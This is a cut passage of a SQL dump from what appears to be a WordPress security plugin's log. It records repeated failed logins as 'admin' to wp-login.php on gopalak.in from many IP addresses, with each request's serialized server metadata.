00:00:00'),(95339,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44804\";s:11:\"REMOTE_ADDR\";s:14:\"116.204.78.140\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746898820.807091;s:12:\"REQUEST_TIME\";i:1746898820;}}','116.204.78.140',0,'2025-05-10 23:10:22','1970-01-01 00:00:00'),(95340,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54426\";s:11:\"REMOTE_ADDR\";s:11:\"81.71.88.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746899328.785769;s:12:\"REQUEST_TIME\";i:1746899328;}}','81.71.88.89',0,'2025-05-10 23:18:50','1970-01-01 00:00:00'),(95341,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42450\";s:11:\"REMOTE_ADDR\";s:14:\"162.240.232.97\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746899838.522157;s:12:\"REQUEST_TIME\";i:1746899838;}}','162.240.232.97',0,'2025-05-10 23:27:20','1970-01-01 00:00:00'),(95342,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45460\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746900338.8867619;s:12:\"REQUEST_TIME\";i:1746900338;}}','162.0.209.103',0,'2025-05-10 23:35:40','1970-01-01 00:00:00'),(95343,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53990\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746900829.228323;s:12:\"REQUEST_TIME\";i:1746900829;}}','198.54.126.98',0,'2025-05-10 23:43:51','1970-01-01 00:00:00'),(95344,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36336\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746901317.6268029;s:12:\"REQUEST_TIME\";i:1746901317;}}','103.169.35.190',0,'2025-05-10 23:51:59','1970-01-01 00:00:00'),(95345,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43442\";s:11:\"REMOTE_ADDR\";s:12:\"209.145.51.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746901809.8184431;s:12:\"REQUEST_TIME\";i:1746901809;}}','209.145.51.5',0,'2025-05-11 00:00:11','1970-01-01 00:00:00'),(95346,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40764\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.72.157\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746902296.4077411;s:12:\"REQUEST_TIME\";i:1746902296;}}','45.90.72.157',0,'2025-05-11 00:08:18','1970-01-01 00:00:00'),(95347,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36260\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.145.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746902775.1882319;s:12:\"REQUEST_TIME\";i:1746902775;}}','68.183.145.0',0,'2025-05-11 00:16:16','1970-01-01 00:00:00'),(95348,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55256\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.132.42\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746903247.4152811;s:12:\"REQUEST_TIME\";i:1746903247;}}','66.29.132.42',0,'2025-05-11 00:24:09','1970-01-01 00:00:00'),(95349,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41564\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-